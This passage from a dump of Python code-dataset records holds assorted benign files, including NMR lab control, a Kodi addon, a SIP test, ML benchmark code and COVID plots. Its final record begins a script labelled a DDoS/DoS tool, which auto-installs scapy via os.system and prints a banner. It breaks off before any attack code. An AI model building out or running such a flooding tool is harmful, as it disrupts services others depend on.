hold=True, linewidth=2, label = self.Type[count])\n plt.xticks(range(len(self.months)), self.months)\n plt.legend() \n \n \n \n","sub_path":"tools/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173739461","text":"import argparse\nimport os\n\nprint(\"In comparemodels.py: as a data scientist, this is where you should fill in code to compare two models.\")\n\nparser = argparse.ArgumentParser(\"comparemodels\")\nparser.add_argument(\"--new_model_location\", type=str, help=\"new_model_location directory\")\nparser.add_argument(\"--prod_model_location\", type=str, help=\"prod_model_location directory\")\nparser.add_argument(\"--model_version\", type=str, help=\"model_version\")\nparser.add_argument(\"--compare_result\", type=str, help=\"compare_result directory\")\n\nargs = parser.parse_args()\n\nprint(f\"Argument 1: {args.new_model_location}\")\nprint(f\"Argument 2: 
{args.prod_model_location}\")\nprint(f\"Argument 3: {args.model_version}\")\nprint(f\"Argument 4: {args.compare_result}\")\n\nif not (args.compare_result is None):\n\tos.makedirs(args.compare_result, exist_ok=True)\n\tprint(f\"{args.compare_result} created\")\n","sub_path":"scripts/compare/comparemodels.py","file_name":"comparemodels.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365604245","text":"'''\nCreated on Mar 30, 2018\n\n@author: David Ariando\n\nEdits: Cheng Chen, 07/2020, add automatic tuning\n08/2020, run in 10KHz spacing\n\nDescription: NMR sweep measurements for multiple customized frequencies\n'''\n\n#!/usr/bin/python\n\nimport os\nimport time\n\nfrom nmr_std_function.data_parser import parse_simple_info\nfrom nmr_std_function.nmr_functions import compute_iterate\nfrom nmr_std_function.nmr_class import tunable_nmr_system_2018\nfrom nmr_std_function.data_parser import parse_csv_float2col\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport pydevd\nimport numpy as np\nfrom datetime import datetime\nimport shutil\nfrom nmr_std_function import data_parser\n\n# variables\ndata_folder = \"/root/NMR_DATA\"\nen_scan_fig = 0\nen_fig = 0\nen_remote_dbg = 0\nfig_num = 100\ndirect_read = 0 # perform direct read from SDRAM. use with caution above!\n\ntx_sd_msk = 1 # 1 to shutdown 8tx opamp during reception, or 0 to keep it powered up during reception\nen_dconv = 1 # enable downconversion in the fpga\ndconv_fact = 4 # downconversion factor. minimum of 4.\n\nprocess_data = 0\npara_folder = \"/root/nmr_pcb20_hdl10_2018/MAIN_nmr_code/para\"\nload_para = 1 # load parameter for matching network and preamp\n\n# instantiate nmr object\nnmrObj = tunable_nmr_system_2018( data_folder, en_remote_dbg )\n\n# cpmg settings\n#cpmg_freq = 1.99\npulse1_dtcl = 0.5 # useless with current code\npulse2_dtcl = 0.5 # useless with current code\necho_spacing_us = 500\nscan_spacing_us = 22000\nsamples_per_echo = 2048 # number of points\nechoes_per_scan = 40 # number of echos\ninit_adc_delay_compensation = 20 # acquisition shift microseconds\nnumber_of_iteration = 1000 # number of averaging\nph_cycl_en = 1\npulse180_t1_int = 0\ndelay180_t1_int = 0\necho_skip = 1\n\npulse1_us = 30 # pulse pi/2 length\npulse2_us = 45 #pulse_us_sw[i] # pulse pi length\n\n# sweep settings\nFreq_step = 1 # number of steps\n\ncpmg_freq_sta = 2.18 # in MHz\ncpmg_freq_sto = 2.18 # in MHz\ncpmg_freq_sw = np.linspace(cpmg_freq_sta, cpmg_freq_sto, Freq_step)\n\ncpmg_freq_sw[0]=2.02\n#cpmg_freq_sw[1]=2.12\n#cpmg_freq_sw[2]=2.08\n#cpmg_freq_sw[3]=2.03\n#cpmg_freq_sw[4]=1.99\n#cpmg_freq_sw[5]=1.95\n#cpmg_freq_sw[6]=1.91\n#cpmg_freq_sw[7]=1.87\n#cpmg_freq_sw[8]=1.83\n#cpmg_freq_sw[9]=1.79\n#cpmg_freq_sw[10]=1.75\n#cpmg_freq_sw[11]=1.71\n#cpmg_freq_sw[12]=1.76\n#cpmg_freq_sw[13]=1.73\n#cpmg_freq_sw[14]=1.70\n#cpmg_freq_sw[15]=1.67\n\ncpmg_freq_sta = number_of_iteration # in MHz\ncpmg_freq_sto = number_of_iteration # in MHz\ncpmg_NI_sw = np.linspace(cpmg_freq_sta, cpmg_freq_sto, Freq_step)\n\ncpmg_NI_sw[0]=10\n#cpmg_NI_sw[1]=8000\n#cpmg_NI_sw[2]=8000\n#cpmg_NI_sw[3]=8000\n#cpmg_NI_sw[4]=8000\n#cpmg_NI_sw[5]=8000\n#cpmg_NI_sw[6]=8000\n#cpmg_NI_sw[7]=8000\n#cpmg_NI_sw[8]=8000\n#cpmg_NI_sw[9]=8000\n#cpmg_NI_sw[10]=8000\n#cpmg_NI_sw[11]=8000\n#cpmg_NI_sw[12]=8000\n#cpmg_NI_sw[13]=8000\n#cpmg_NI_sw[14]=8000\n#cpmg_NI_sw[15]=8000\n\n\n# system setup\n# system setup\nnmrObj.initNmrSystem() # necessary to set the GPIO initial setting\n# 
nmrObj.turnOnPower()\nnmrObj.assertControlSignal( nmrObj.PSU_15V_TX_P_EN_msk | nmrObj.PSU_15V_TX_N_EN_msk | nmrObj.PSU_5V_TX_N_EN_msk |\n nmrObj.PSU_5V_ADC_EN_msk | nmrObj.PSU_5V_ANA_P_EN_msk |\n nmrObj.PSU_5V_ANA_N_EN_msk )\n\n\n\nnow = datetime.now()\ndatename = now.strftime( \"%Y_%m_%d_%H_%M_%S\" )\n\n# define the name of the directory to be created\ndst_path = data_folder + '/' + datename + '_FreqSweep'\n\ntry:\n os.mkdir(dst_path)\nexcept OSError:\n print (\"Creation of the directory %s failed\" % dst_path)\nelse:\n print (\"Successfully created the directory %s \" % dst_path)\n\na_integ_table = np.zeros( Freq_step )\nfor i in range( 0, Freq_step ):\n print( '----------------------------------' )\n print( 'frequency = ' + str( cpmg_freq_sw[i] ) + ' MHz' )\n\n \n #cpmg_freq=cpmg_freq_sw[i]\n \n # compensate for setup \n freq_comp = cpmg_freq_sw[i]+0.10\n freqS21_comp = cpmg_freq_sw[i]\n number_of_iteration=cpmg_NI_sw[i]\n if (load_para):\n # parameter from \n ( FreqList, s11List, CparList, CserList ) = data_parser.parse_csv_float4col_s11( \n para_folder, '/genS11Table_final_input_10k.txt' ) # read file\n Cpar = int(CparList[[i for i, elem in enumerate( FreqList ) if abs( elem - freq_comp) < 0.01][0]])\n Cser = int(CserList[[i for i, elem in enumerate( FreqList ) if abs( elem - freq_comp) < 0.01][0]])\n \n ( FreqList_S21, PeakVoltage, VvaracList, VbiasList ) = data_parser.parse_csv_float4col_s11( \n para_folder, '/genS21Table_input_10k.txt' ) # read file\n Vbias = VbiasList[[i for i, elem in enumerate( FreqList_S21 ) if abs( elem - freqS21_comp) < 0.01][0]]\n Vvarac = VvaracList[[i for i, elem in enumerate( FreqList_S21 ) if abs( elem - freqS21_comp) < 0.01][0]]\n else:\n Cpar = 563\n Cser = 327\n Vbias = -2.0\n Vvarac = 2.8\n \n nmrObj.setPreampTuning(Vbias, Vvarac)\n nmrObj.setMatchingNetwork(Cpar, Cser)\n\n nmrObj.assertControlSignal( \n nmrObj.RX1_1H_msk | nmrObj.RX1_1L_msk | nmrObj.RX2_L_msk | nmrObj.RX2_H_msk | nmrObj.RX_SEL1_msk | nmrObj.RX_FL_msk | nmrObj.RX_FH_msk | nmrObj.PAMP_IN_SEL2_msk )\n \n #nmrObj.cpmgSequence( cpmg_freq_sw[i], pulse1_us, pulse2_us, pulse1_dtcl, pulse2_dtcl, echo_spacing_us, scan_spacing_us, samples_per_echo,\n # echoes_per_scan, init_adc_delay_compensation, number_of_iteration, ph_cycl_en, pulse180_t1_int, delay180_t1_int,\n # tx_sd_msk, en_dconv, dconv_fact )\n nmrObj.cpmgSequence( cpmg_freq_sw[i], pulse1_us, pulse2_us, pulse1_dtcl, pulse2_dtcl, echo_spacing_us, scan_spacing_us, samples_per_echo,\n echoes_per_scan, init_adc_delay_compensation, number_of_iteration, ph_cycl_en, pulse180_t1_int, delay180_t1_int,\n tx_sd_msk, en_dconv, dconv_fact, echo_skip)\n datain = [] # set datain to 0 because the data will be read from file instead\n meas_folder = parse_simple_info( data_folder, 'current_folder.txt' )\n\n if en_dconv:\n src_file = ( data_folder + '/' + meas_folder[0] + '/dconv')\n dst_file = ( dst_path + '/dconv_{}'.format(i))\n shutil.copy2(src_file, dst_file)\n else:\n src_file = ( data_folder + '/' + meas_folder[0] + '/asum')\n dst_file = ( dst_path + '/asum_{}'.format(i))\n shutil.copy2(src_file, dst_file) \n \n if process_data:\n ( a, a_integ, a0, snr, T2, noise, res, theta, data_filt, echo_avg, Df, t_echospace ) = compute_iterate( \n nmrObj, data_folder, meas_folder[0], 0, 0, 0, direct_read, datain, en_scan_fig, )\n\n a_integ_table[i] = a_integ\n \n if en_fig:\n plt.ion()\n fig = plt.figure( fig_num )\n fig.clf()\n ax = fig.add_subplot( 1, 1, 1 )\n line1, = ax.plot( cpmg_freq_sw[0:i + 1], a_integ_table[0:i + 1], 'b-o' )\n # ax.set_ylim(-50, 0)\n 
# ax.set_xlabel('Frequency [MHz]')\n # ax.set_ylabel('S11 [dB]')\n # ax.set_title(\"Reflection Measurement (S11) Parameter\")\n ax.grid()\n fig.canvas.draw()\n # fig.canvas.flush_events()\n\n# turn off system\nnmrObj.deassertControlSignal( \n nmrObj.RX1_1H_msk | nmrObj.RX1_1L_msk | nmrObj.RX2_L_msk | nmrObj.RX2_H_msk | nmrObj.RX_SEL1_msk | nmrObj.RX_FL_msk | nmrObj.RX_FH_msk | nmrObj.PAMP_IN_SEL2_msk )\n\nnmrObj.setMatchingNetwork( 0, 0 )\nnmrObj.setPreampTuning( 0, 0 )\nnmrObj.deassertControlSignal( nmrObj.PSU_15V_TX_P_EN_msk | nmrObj.PSU_15V_TX_N_EN_msk | nmrObj.PSU_5V_TX_N_EN_msk |\n nmrObj.PSU_5V_ADC_EN_msk | nmrObj.PSU_5V_ANA_P_EN_msk | nmrObj.PSU_5V_ANA_N_EN_msk )\n\nshutil.copy2(data_folder + '/' + meas_folder[0] + '/acqu.par', dst_path)\n\nfor kk in range( 0, Freq_step ):\n data_parser.write_text_append(dst_path, 'acqu.par', 'Freq = {}'.format(cpmg_freq_sw[kk]))\n\nif en_fig:\n fig.savefig( dst_path + '/' + datename + '_pulsesw.pdf' )\n\n\npass\npass\n","sub_path":"MAIN_nmr_code/nmr_sw_freq_auto.py","file_name":"nmr_sw_freq_auto.py","file_ext":"py","file_size_in_byte":7881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"376908399","text":"import xbmcplugin, xbmcgui, xbmcaddon, urllib2, sys\nimport xml.etree.ElementTree as etree\n\nRSS_FEED = \"http://feeds.feedburner.com/computeractionshowvideo?format=xml\"\n \ndef addLink(name, url):\n li = xbmcgui.ListItem(name, iconImage=\"DefaultVideo.png\")\n li.setProperty(\"IsPlayable\", \"true\")\n li.setInfo(type=\"Video\", infoLabels={\"Title\":name})\n xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=li, isFolder=False)\n \ntry:\n xml = urllib2.urlopen(RSS_FEED).read()\n root = etree.fromstring(xml)\n for itm in root.findall(\"./channel/item\"):\n for itmelems in itm: \n if itmelems.tag == \"title\":\n title = itmelems.text\n elif itmelems.tag == \"enclosure\":\n link = itmelems.attrib[\"url\"]\n\n addLink(title, link)\nexcept Exception as e:\n addLink(\"%s\"%e,\"\")\n\nxbmcplugin.endOfDirectory(int(sys.argv[1]))\n","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101583690","text":"# from app import app\nimport urllib.request,json\n# base_url = None\n\ndef get_blogs():\n get_blogs_url = 'http://quotes.stormconsultancy.co.uk/random.json'\n\n with urllib.request.urlopen(get_blogs_url) as url:\n blogs = url.read()\n get_blogs_response = json.loads(blogs)\n \n return get_blogs_response","sub_path":"app/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313957663","text":"import asyncio\n\n\nasync def add_number(num1, num2):\n await asyncio.sleep(num1)\n print(f\"slept for {num1}\")\n return num1 + num2\n\n\nasync def main():\n res = await asyncio.gather(*(add_number(i, i) for i in range(1, 11)))\n return res\n\nres = asyncio.run(main())\n\nprint(res)\n","sub_path":"demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127170630","text":"\"\"\"\nCopyright (c) 2018 Cisco Systems, Inc.\nAuthor: \"Christopher Liu\" \n\"\"\"\nfrom tng.api import runner\nfrom tng_sl.contrib.pitstop_helper import PitstopTestCase\nfrom pitstop.exp import Wait, Receive, Send, Flag, Exit, 
All\n\n\nclass Test(PitstopTestCase):\n\n required_caps = ['multiline']\n\n def test_CSCvi63592_register_fail_no_subscribe(self):\n '''\n This test verifies the case which was reported via CSCvi63592.\n In the original issue when phone register succeeds at the first time\n and fails at the second time, phone still sends out subscribe with\n an error retry interval.\n In this test cases we'll verify that after the second register failure,\n phone will not sent any subscribe message to the server until\n re-register is ok again.\n\n Phone registers for three times, only the second registration fails.\n Check that phone will not send subscribe after the registration failure\n even when the last successful subscribe expires.\n\n 1. Configure line proxy|userid and linekey call park\n 2. Let server return 200 OK to the first register\n 3. Check phone register ok and subscribe ok\n 4. Let server return 500 error to the second register\n 5. Check phone will not send subscribe\n 6. Let server return 200 OK to the third register\n 7. Check phone will send subscribe again\n '''\n self.conf.edit('Extension_2_', 'Disabled')\n self.conf.edit(\n 'Extended_Function_2_',\n 'fnc=prk;sub=$USER@$PROXY;nme=call park;vid=1')\n self.conf.edit('Reg_Retry_Long_Intvl', '60')\n self.conf.edit('Subscribe_Expires', '65')\n\n notify_content = (\n ''\n ''\n '')\n\n self.spec.update({\n 'expect': [\n Wait('idle'),\n Wait('sub_ok'),\n Wait('resub_ok').then([Flag('idle')])\n ],\n\n 'register_subscribe': [\n # first registration, followed by a subscribe\n Receive('REGISTER', {}, transaction_label='r1').then([\n Send('200', {'Expires': '60'}, on_transaction='r1')]),\n Receive('SUBSCRIBE', {\n 'Event': 'x-broadworks-callpark'},\n transaction_label='s1').then([\n Send(\n '200', {}, on_transaction='s1',\n dialog_label='sub_dialog'),\n Send(\n 'NOTIFY', {\n 'Event': 'x-broadworks-callpark',\n 'Subscription-State': 'active;expires=64',\n 'Content-Type': (\n 'application/'\n 'x-broadworks-callpark-info+xml'),\n '\\n': notify_content},\n transaction_label='n1',\n in_dialog='sub_dialog')]),\n Receive('200', {}, on_transaction='n1').then([\n Flag('sub_ok')]),\n # second registration, expect no subscribe from phone\n # if still subscribe, will raise 'in-dialog request unexpected'\n Receive('REGISTER', {}, transaction_label='r2').then([\n Send('500', {}, on_transaction='r2')]),\n # third registration, followed by a subscribe\n Receive('REGISTER', {}, transaction_label='r3').then([\n Send('200', {'Expires': '60'}, on_transaction='r3')]),\n Receive('SUBSCRIBE', {\n 'Event': 'x-broadworks-callpark'},\n transaction_label='s3').then([\n Send(\n '200', {}, on_transaction='s3',\n dialog_label='new_sub_dialog'),\n Send(\n 'NOTIFY', {\n 'Event': 'x-broadworks-callpark',\n 'Subscription-State': 'active;expires=64',\n 'Content-Type': (\n 'application/'\n 'x-broadworks-callpark-info+xml'),\n '\\n': notify_content},\n transaction_label='n3',\n in_dialog='new_sub_dialog')]),\n Receive('200', {}, on_transaction='n3').then([\n Flag('resub_ok')])\n ],\n })\n\n self.pitstop(timer=200)\n\n\ndef main():\n runner()\n","sub_path":"pitstop_tests/cdets/CSCvi63592_register_fail_no_subscribe.py","file_name":"CSCvi63592_register_fail_no_subscribe.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162376574","text":"from collections import defaultdict\nimport random\n\nfrom tqdm import tqdm\n\nfrom capreolus.utils.common import register_component_module, 
import_component_modules\nfrom capreolus.utils.loginit import get_logger\n\nlogger = get_logger(__name__) # pylint: disable=invalid-name\n\n\nclass Benchmark:\n ALL = {}\n\n def __init__(self, search_run, collection, pipeline_config):\n self.search_run = search_run\n self.collection = collection\n self.pipeline_config = pipeline_config\n self.extractor = None # Need this to transform training tuples with ids into embedding features\n self.reranking_runs = {}\n\n def set_extractor(self, extractor):\n self.extractor = extractor\n\n def build(self):\n \"\"\" Initialization method for subclasses to override \"\"\"\n raise NotImplementedError\n\n def create_and_store_train_and_pred_pairs(self, folds):\n \"\"\"\n Based on runs, generate and store pairs of (q_id, doc_ids) for future use.\n \"\"\"\n # the run selected to rerank for each fold\n self.reranking_runs = {}\n\n # train on only docs that show up in the searcher? (rather than all judged docs)\n self.train_pairs = self.collection.qrels\n if self.pipeline_config[\"rundocsonly\"]:\n self.train_pairs = {}\n\n # predict on only the docs to rerank (not on all judged docs)\n self.pred_pairs = {}\n\n for name, d in folds.items():\n dev_qids = set(d[\"train_qids\"]) | set(d[\"predict\"][\"dev\"])\n test_qids = set(d[\"predict\"][\"test\"])\n full_search_run = self.search_run.crossvalidated_ranking(dev_qids, test_qids, full_run=True)\n self.reranking_runs[name] = full_search_run\n search_run = {qid: docscores for qid, docscores in full_search_run.items() if qid in test_qids}\n\n for qid, docscores in search_run.items():\n self.pred_pairs.setdefault(qid, []).extend(docscores.keys())\n\n if self.pipeline_config[\"rundocsonly\"]:\n for qid, docscores in self.search_run.crossvalidated_ranking(dev_qids, set(d[\"train_qids\"])).items():\n self.train_pairs.setdefault(qid, set()).update(docscores.keys())\n\n def get_features(self, d):\n d = self.extractor.transform_qid_posdocid_negdocid(d[\"qid\"], d[\"posdocid\"], d.get(\"negdocid\"))\n return d\n\n def pred_tuples(self, pred_pairs):\n if self.pipeline_config[\"sample\"] == \"simple\":\n return self.simple_pred_tuples(pred_pairs)\n\n return None\n\n def training_tuples(self, qids):\n if self.pipeline_config[\"sample\"] == \"simple\":\n return self.simple_training_tuples(qids)\n\n return None\n\n def simple_pred_tuples(self, pred_pairs):\n def predgenf():\n batch = defaultdict(list)\n for qid in tqdm(pred_pairs):\n for posdocid in pred_pairs[qid]:\n features = self.get_features({\"qid\": qid, \"posdocid\": posdocid})\n if features is None:\n logger.warning(\"predict got none features: qid=%s docid=%s\", qid, posdocid)\n continue\n\n for k, v in features.items():\n batch[k].append(v)\n\n if len(batch[\"qid\"]) == self.pipeline_config[\"batch\"]:\n yield self.prepare_batch(batch)\n batch = defaultdict(list)\n\n if len(batch[\"qid\"]) > 0:\n missing = self.pipeline_config[\"batch\"] - len(batch[\"qid\"])\n for k in batch:\n batch[k] = batch[k] + ([batch[k][-1]] * missing)\n yield self.prepare_batch(batch)\n\n logger.debug(\"Starting to get {0} pred pairs\".format(len(pred_pairs)))\n x = list(predgenf())\n logger.debug(\"Done getting pred pairs\")\n return x\n\n def get_posdocs_and_negdocs_for_qids(self, qids):\n labels = {\n qid: {docid: label for docid, label in self.collection.qrels[qid].items() if docid in self.train_pairs[qid]}\n for qid in qids\n }\n\n reldocs = {qid: [docid for docid, label in labels[qid].items() if label > 0] for qid in labels}\n negdocs = {qid: [docid for docid, label in 
labels[qid].items() if label <= 0] for qid in labels}\n\n return reldocs, negdocs\n\n def simple_training_tuples(self, qids):\n qid_order = [qid for qid in qids if qid in self.train_pairs and qid in self.collection.qrels]\n\n reldocs, negdocs = self.get_posdocs_and_negdocs_for_qids(qid_order)\n for qid in list(qid_order):\n if len(reldocs.get(qid, [])) == 0 or len(negdocs.get(qid, [])) == 0:\n qid_order.remove(qid)\n logger.warning(\"skipping qid=%s with no positive and/or negative samples\", qid)\n\n def genf():\n batch = defaultdict(list)\n while True:\n random.shuffle(qid_order)\n for qid in qid_order:\n posdocid = random.choice(reldocs[qid])\n negdocid = random.choice(negdocs[qid])\n\n features = self.get_features({\"qid\": qid, \"posdocid\": posdocid, \"negdocid\": negdocid})\n if features is None:\n logger.warning(\"got none features: qid=%s posid=%s negid=%s\", qid, posdocid, negdocid)\n continue\n\n for k, v in features.items():\n batch[k].append(v)\n\n if len(batch[\"qid\"]) == self.pipeline_config[\"batch\"]:\n yield self.prepare_batch(batch)\n batch = defaultdict(list)\n\n return genf()\n\n def prepare_batch(self, batch):\n return batch\n\n @staticmethod\n def config():\n raise NotImplementedError(\"config method must be provided by subclass\")\n\n @classmethod\n def register(cls, subcls):\n return register_component_module(cls, subcls)\n\n\nimport_component_modules(\"benchmark\")\n","sub_path":"capreolus/benchmark/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"604011087","text":"import os\r\nfrom typing import Tuple\r\n\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\n\r\nfrom common import patient_slice_generator\r\nfrom config import reu2018\r\nfrom patient import Patient\r\nfrom utils import get_dir_list, read_file, save_slice_pair\r\n\r\n\r\ndef slice_mri_data(config):\r\n ff = get_dir_list(config['mri_dir'])\r\n ff1 = config['mri_dir'] / ff[0]\r\n dirs = get_dir_list(ff1)\r\n\r\n for subject_dir in tqdm(dirs, total=len(dirs), desc=\"Patients\"):\r\n #direction = config['mri_dir']/ subject_dir\r\n direction = ff1 / subject_dir\r\n patient = process_directory(direction, config)\r\n\r\n if not patient.check_valid():\r\n continue\r\n\r\n slice_gen = patient_slice_generator(patient, config)\r\n \r\n for image_slice, mask_slice, idx in slice_gen:\r\n\r\n #idx = 0.5???\r\n # if os.path.isfile(str(config['sliced_mri_data_dir'] / '{}'.format(patient.id) / '{}_{}.png'.format(patient.id, idx))) and \\\r\n # os.path.isfile(str(config['sliced_mri_mask_dir'] / '{}'.format(patient.id) / '{}_{}.png'.format(patient.id, idx))):\r\n # continue\r\n\r\n\r\n if type(config['slice_mode']) == str:\r\n if config['slice_mode'] == 'tumor_only':\r\n #if np.max(mask_slice) == 1:\r\n if idx == 128/2:\r\n for i in range(20):\r\n idm = idx - 10 + i\r\n save_slice_pair(patient.id, idm, image_slice, mask_slice, config)\r\n elif config['slice_mode'] == 'all':\r\n if np.sum(image_slice) > 64:\r\n save_slice_pair(patient.id, idx, image_slice, mask_slice, config)\r\n else:\r\n raise ValueError(\"Invalid slice_mode entered in configuration.\")\r\n elif type(config['slice_mode'] == Tuple[int, int]):\r\n if config['slice_mode'][0] < idx < config['slice_mode'][1]:\r\n save_slice_pair(patient.id, idx, image_slice, mask_slice, config)\r\n else:\r\n raise ValueError(\"Invalid slice_mode entered in configuration.\")\r\n save_slice_pair(patient.id, idx, image_slice, mask_slice, 
config)\r\n\r\ndef process_directory(_dir, config):\r\n my_patient = Patient(_dir.parts[-1])\r\n\r\n extension = config['mri_file_extensions']\r\n if extension == '*.nii.gz':\r\n for mri_file in _dir.glob(extension):\r\n name1 = config['data_filename_contains'] + '.nii.gz'\r\n name2 = config['mask_filename_contains'] + '.nii.gz'\r\n if name1 == mri_file.parts[-1]:\r\n data, _ = read_file(mri_file)\r\n my_patient.add_data(data)\r\n if config['mask_filename_contains'] in mri_file.parts[-1]:\r\n mask, _ = read_file(mri_file)\r\n my_patient.add_mask(mask)\r\n\r\n return my_patient\r\n\r\n\r\nif __name__ == \"__main__\":\r\n slice_mri_data(reu2018)\r\n","sub_path":"Desktop/Research/unet2dforgithub/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252341380","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\n# %%\n\ndb = pd.read_csv(\"https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest.csv\",\n low_memory=False)\n\ndb.sort_values(by=['CountryName', 'RegionName', 'Date'])\n\n\n# %%\n\ndef cases_plots(name, \n region_name='',\n show_moving_average=True,\n days_for_average=7,\n weights='default',\n show_deaths=False,\n show_total=False):\n\n \n state = db[db['CountryName']==name]\n \n if region_name != '':\n state = state[state['RegionName']==region_name]\n region_name = ' ('+region_name+') '\n \n day_cases = np.ediff1d(state['ConfirmedCases'])\n plt.plot(state['Date'][:-1].astype(str), day_cases, 'b', label='daily cases')\n \n if show_deaths == True:\n day_deaths = np.ediff1d(state['ConfirmedDeaths'])\n plt.plot(state['Date'][:-1].astype(str), day_deaths, 'grey', label='daily deaths')\n \n if show_moving_average == True:\n \n convolve_mode='valid'\n \n # remember that weights are flipped, they go from last to first\n if weights=='default':\n weights = np.ones(days_for_average)/days_for_average\n else:\n weights = np.asarray(weights)\n \n if np.sum(weights) != 1.:\n weights = weights/np.sum(weights)\n \n assert(len(weights)==days_for_average)\n \n avg_cases = np.convolve(day_cases, weights, convolve_mode)\n plt.plot(state['Date'][int(days_for_average/2):-int(days_for_average/2)-days_for_average%2].astype(str), avg_cases, 'r', label=str(days_for_average)+'-days moving average cases')\n\n \n if show_deaths == True:\n avg_deaths = np.convolve(day_deaths, weights, convolve_mode)\n plt.plot(state['Date'][int(days_for_average/2):-int(days_for_average/2)-days_for_average%2].astype(str), avg_deaths, 'k', label=str(days_for_average)+'-days moving average deaths')\n\n \n if show_total == True:\n \n plt.plot(state['Date'][:].astype(str), state['ConfirmedCases'], label='total cases')\n \n if show_deaths == True:\n plt.plot(state['Date'][:].astype(str), state['ConfirmedDeaths'], label='total deaths')\n \n\n \n final_pos, final_tic = [], []\n \n for pos, tic in zip(plt.xticks()[0], plt.xticks()[1]):\n if pos%30==0:\n final_pos.append(pos)\n final_tic.append(str(state.Date.iloc[pos])[4:6]+'/'+str(state.Date.iloc[pos])[6:])\n \n \n plt.xticks(final_pos, final_tic)\n \n plt.xlabel(\"Day (MM/DD)\")\n plt.ylabel(\"Counts\")\n plt.title(name+region_name+\" Covid-19 cases\")\n plt.grid()\n plt.legend()\n \n plt.show()\n \n \n \n# %%\n\ncases_plots(name='United Kingdom', # Use capital letter for each distinct word and space between them\n region_name='England',\n# weights=[1, 1, 1, 100, 100, 1, 1, 
1],  # if you want to use your own weights\n            days_for_average=7)  # suggestion: use an odd number to have the sliding window \"centered\" over a single day\n\n","sub_path":"personal/LD/Cases_plots.py","file_name":"Cases_plots.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299445438","text":"# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP2_3_C&lang=jp\n# Count\n\nimport sys\ninput = sys.stdin.readline\n\n\ndef main():\n    n = int(input())  # consume the element count; the list length is implied by the next line\n    l = list(map(int, input().split()))\n\n    for _ in range(int(input())):\n        n1, n2, a = map(int, input().split())\n        count = l[n1:n2].count(a)\n        print(count)\n\nif __name__ == '__main__':\n    main()","sub_path":"ITP2/ITP2_3_C.py","file_name":"ITP2_3_C.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535783527","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef open_file(file_title):\n    f = open(file_title, 'r', encoding='utf-8')\n    file = f.readlines()\n\n    table = []\n    for row in file:\n        # quoted commas mark the field boundaries; turn them into '+' separators\n        row = row.replace('\",', '+').replace(',\"', '+')\n        table.append(row.rstrip().split('+'))\n\n    f.close()\n    return table\n\n\ndef column_data(table):\n    date = []\n    link = []\n    trafic = []\n    date_time = []\n    port = []\n\n    column = [date, link, trafic, date_time, port]\n\n    for row in table:\n        for i in range(len(row)):\n            if i >= len(column):\n                break\n            column[i].append(row[i])\n\n    return column\n\n\ndef count_trafics(column):\n    # column[2] holds the traffic counts, column[3] the timestamps\n    count = column[2]\n    time = column[3]\n\n    all_trafic = []\n    summ_insecond = [int(count[0])]\n\n    for num in range(1, len(time)):\n        if time[num-1] == time[num]:\n            summ_insecond.append(int(count[num]))\n        else:\n            all_trafic.append([time[num-1], sum(summ_insecond)])\n            # start the next second with the current sample, not an empty list\n            summ_insecond = [int(count[num])]\n\n    datetime = [row[0] for row in all_trafic]\n    number = [row[1] for row in all_trafic]\n\n    return [datetime, number]\n\n\ndef mk_viz(column):\n    datetime, number = count_trafics(column)\n\n    viz = pd.DataFrame({'Time': datetime, 'Traffic volume': number})\n\n    viz.plot(x='Time', y='Traffic volume')\n    plt.title('Traffic distribution over the given period')\n    plt.ylabel('Traffic volume')\n    plt.xlabel('Time')\n    plt.savefig('doc_for_send/data_14-10-2021.png')\n","sub_path":"table_1_volume_data.py","file_name":"table_1_volume_data.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"626287540","text":"#DDoS.py\n\n#Imports:\nimport os\nimport threading\n\n# Install scapy if it is missing, then import it.\nos.system('pip3 install scapy')\nfrom scapy.all import *\n\n\nversion = 'v Alpha 0.1'\n\n# Change version in var\n\ntitle = '''\n\nA DDoS/ DoS script written in Python, the upgraded version of the Batch version.\n\nsrforek\n\n __ _ ___ ___ __ _ ___ __ __ __ __\n| \\| |_ | __| \\| (_ | __ | _\\| _\\ /__\\ /' _/\n| | ' |/ /| _|| | ' |/ / |__| | v | v | \\/ |`._`.\n|_|\\__|___|___|_|\\__|___| |__/|__/ \\__/ |___/\n\n\n'''+version+'''\n\n:DDoS/ DoS python script:\n\nBy editor99\n\n\nGithub repo: 
